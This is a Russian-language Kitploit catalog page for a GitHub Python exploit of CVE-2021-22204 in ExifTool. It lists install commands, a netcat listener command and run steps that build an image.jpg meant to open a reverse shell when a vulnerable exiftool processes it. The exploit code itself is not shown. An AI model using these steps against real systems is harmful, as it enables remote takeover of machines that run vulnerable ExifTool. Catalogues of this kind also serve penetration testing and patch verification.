Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mr-tuhin/cve-2021-22204-exiftool
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmr-tuhin/cve-2021-22204-exiftool

CVE-2021-22204-exiftool

Python-эксплойт для CVE-2021-22204 в ExifTool, создающий вредоносное изображение, которое запускает обратную оболочку при обработке уязвимыми версиями.

Репозиторий
924 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22204-exiftool

Python-эксплойт для уязвимости CVE-2021-22204 в Exiftool.

Видеоурок

Youtube

root@kitploit:~
    404 notfound

Требования

root@kitploit:~
python3 python3-pip djvulibre-bin exiftool

Установка требований

Debian

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Ubuntu

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Arch Linux

root@kitploit:~
    pacman -S djvulibre libimage-exiftool-perl python python-pip

Kali Linux

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Fedora

root@kitploit:~
    dnf install djvulibre libimage-exiftool-perl python-minimal python-pip

OS X

root@kitploit:~
    brew install djvulibre exiftool python

Raspbian

root@kitploit:~
    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Как запустить:

Установка python-требований

root@kitploit:~
    sudo pip install -r requirements.txt

Запустить reverse shell с помощью netcat

root@kitploit:~
    nc -nvlp 4444

Выдать права на выполнение

root@kitploit:~
    chmod +x exploit.py

Запустить программу

root@kitploit:~
    python3 exploit.py {Ваш IP-адрес} {Ваш порт для прослушивания} 
    

ИЛИ

root@kitploit:~
    ./exploit.py {Ваш IP-адрес} {Ваш порт для прослушивания}

Пример

root@kitploit:~
    python3 exploit.py 192.168.0.1 4444
    

ИЛИ

root@kitploit:~
    ./exploit.py 192.168.0.1 4444

Имя выходного файла

root@kitploit:~
    image.jpg
    

Об уязвимости

Уязвимость CVE-2021-22204 была обнаружена и сообщена Уильямом Боулингом. (@wcbowling)

Этот эксплойт был создан путём изучения патча exiftool после того, как CVE уже была сообщена.

И image.jpg вызовет уязвимость при открытии с помощью уязвимой версии exiftool.

Скачать инструмент